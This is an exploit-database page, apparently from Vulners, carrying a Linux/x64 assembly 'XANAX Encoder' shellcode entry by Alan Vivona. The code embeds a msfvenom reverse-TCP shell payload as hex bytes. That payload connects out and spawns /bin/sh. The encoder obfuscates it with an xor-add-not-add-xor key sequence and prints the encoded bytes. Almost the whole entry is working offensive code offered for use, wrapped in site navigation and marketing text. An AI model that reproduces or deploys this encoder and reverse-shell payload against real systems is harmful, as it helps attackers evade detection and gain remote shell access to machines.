Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x64 - XANAX Encoder Shellcode (127 bytes)

🗓️ 09 Apr 2019 00:00:00Reported by Alan VivonaType 
zdt
 zdt🔗 0day.today👁 17 Views

XANAX Encoder shellcode for Linux/x64, 127 bytes, uses xor-add-not-add-xor sequence with a 4 byte key to encode and write to stdou

Code
Linux/x64 - XANAX Encoder Shellcode (127 bytes)

; Date: 08/04/2019
; XANAX Encoder
; Author: Alan Vivona
; Description: Uses xor-add-not-add-xor sequence with a 4 byte key and writes the encoded version to stdout
; Tested on: x86-x64 GNU/Linux
 
global _start
 
segment .data
 
    keys.xor1 equ 0x29
    keys.add1 equ 0xff
    keys.xor2 equ 0x50
    keys.add2 equ 0x05
 
    payload.len equ 74 ; this can't be over 127 bytes otherwise it will produce nullbytes
 
    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
    payload_start: db  0x6a, 0x29, 0x58, 0x99, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x0f, 0x05, 0x48, 0x97, 0x48, 0xb9, 0x02, 0x00, 0x11, 0x5c, 0x7f, 0x00, 0x00, 0x01, 0x51, 0x48, 0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x6a, 0x2a, 0x58, 0x0f, 0x05, 0x6a, 0x03, 0x5e, 0x48, 0xff, 0xce, 0x6a, 0x21, 0x58, 0x0f, 0x05, 0x75, 0xf6, 0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x52, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
 
 
section .text
 
_start:
 
    encode_setup:
    xor rcx, rcx
    lea rsi, [payload_start]
    encode:    
        mov al, byte [rsi+rcx]
        ; XANAX encoding (xor add not add xor)
        xor al, keys.xor1
        add al, keys.add1
        not al
        add al, keys.add2
        xor al, keys.xor2
        mov byte [rsi+rcx], al
 
        inc rcx
        cmp rcx, payload.len
        jne encode
 
    ; Write
    push 0x01
    pop rax
    mov rdi, rax ; fd 1 = stdout
        ; rsi = [payload_start] from the code above, no need for setting that again
    push payload.len
    pop rdx
    syscall
 
    ; Exit
    xor rbx, rbx
    push 0x3c
    pop rax
    syscall

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Apr 2019 00:00Current
0.1Low risk
Vulners AI Score0.1
xanax encoderlinux/x64shellcode127 bytesencodingxoraddnotstdoutexploitalan vivonagnu/linux
17